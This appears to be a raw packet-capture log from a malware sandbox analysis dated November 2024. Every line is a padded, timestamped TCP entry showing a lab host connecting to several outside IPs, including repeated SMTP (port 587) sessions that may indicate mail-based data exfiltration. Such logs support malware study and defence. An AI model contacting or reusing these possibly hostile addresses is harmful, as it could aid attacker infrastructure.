                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.130059004 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247123003 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247143984 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247210026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247227907 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247272015 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.247303963 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.405467987 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.405499935 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.405630112 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.405646086 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.405705929 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660202026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660214901 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660257101 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660545111 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660545111 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.660584927 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.661355972 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.716463089 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.716490030 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.716723919 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.716747999 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.716799974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875247955 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875329971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875365973 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875394106 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875425100 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.875446081 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270234108 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270260096 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270275116 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270415068 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270431995 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.270468950 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271064043 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271083117 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271135092 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271142960 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271168947 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.271189928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344515085 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344566107 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344645977 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344681025 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344719887 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.344743013 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.461884975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.461931944 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.462004900 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.462014914 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.462094069 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.579147100 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:40.579197884 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.681761980 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.681921959 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.681952000 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.682004929 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.931036949 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.931114912 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.931157112 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.931190968 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.932429075 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:42.932441950 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.385313034 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390435934 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390630960 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390866041 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.390921116 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.395915031 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:50.395970106 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.372798920 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.372894049 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.372940063 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.373013973 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.373112917 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.611309052 CET4988380192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.616370916 CET804988354.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.702799082 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.707711935 CET804988818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.707784891 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.729011059 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.729038000 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.733958960 CET804988818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.733975887 CET804988818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.557163000 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.557199001 CET44349892104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.557251930 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.560697079 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.560709953 CET44349892104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.869353056 CET4989580192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.874399900 CET804989554.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.874485970 CET4989580192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.922804117 CET4989580192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.922847033 CET4989580192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.928940058 CET804989554.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.929111958 CET804989554.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.155417919 CET804988818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.158456087 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.165851116 CET804988818.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.165896893 CET4988880192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.180042982 CET44349892104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.180111885 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.185228109 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.185246944 CET44349892104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.185534954 CET44349892104.26.13.205192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.277872086 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.343775988 CET49892443192.168.2.7104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.378818035 CET4989980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.383799076 CET804989954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.138828993 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.138917923 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140130997 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140155077 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.145180941 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.145211935 CET804992018.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.425523043 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.430500031 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.430560112 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.480004072 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.485050917 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.485135078 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500550032 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500576019 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.505570889 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.505593061 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.163077116 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.173356056 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.178742886 CET804992344.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.178917885 CET4992380192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.237843037 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.238058090 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.242983103 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.339117050 CET4992080192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.349208117 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.356390953 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.356455088 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361669064 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361788988 CET4992980192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.367665052 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.367680073 CET804992918.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481767893 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.481972933 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.487169981 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.726116896 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.726675987 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.731690884 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.807775974 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.812870979 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.812959909 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832964897 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832992077 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.838088036 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.838109016 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977514982 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977549076 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977566004 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.977659941 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.018193007 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.023627996 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.262422085 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.274327040 CET49922587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.279366970 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.473268032 CET8049930172.234.222.138192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.475410938 CET4993080192.168.2.7172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.517896891 CET5874992251.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.133421898 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.133728027 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.850908995 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945317984 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945445061 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945667982 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.945755005 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.950227022 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972387075 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.972403049 CET4996280192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.977359056 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.977375984 CET804996282.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184408903 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.184552908 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.189461946 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424139977 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.424608946 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.429647923 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670398951 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670437098 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670533895 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670670033 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670685053 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.670881987 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.672367096 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.677288055 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.911711931 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.912791967 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:04.917712927 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.152132988 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.152967930 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.157944918 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.392589092 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.392949104 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.397900105 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.636971951 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.637170076 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.642215014 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.876893997 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.877126932 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:05.882008076 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.126171112 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.126386881 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.131335020 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.315167904 CET4995580192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.365643024 CET5874995651.195.88.199192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366034985 CET4997680192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366914988 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.366998911 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367027998 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367069006 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367124081 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367167950 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367201090 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367238998 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.367260933 CET49956587192.168.2.751.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.659919977 CET804999882.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.659930944 CET804999882.112.184.197192.168.2.7
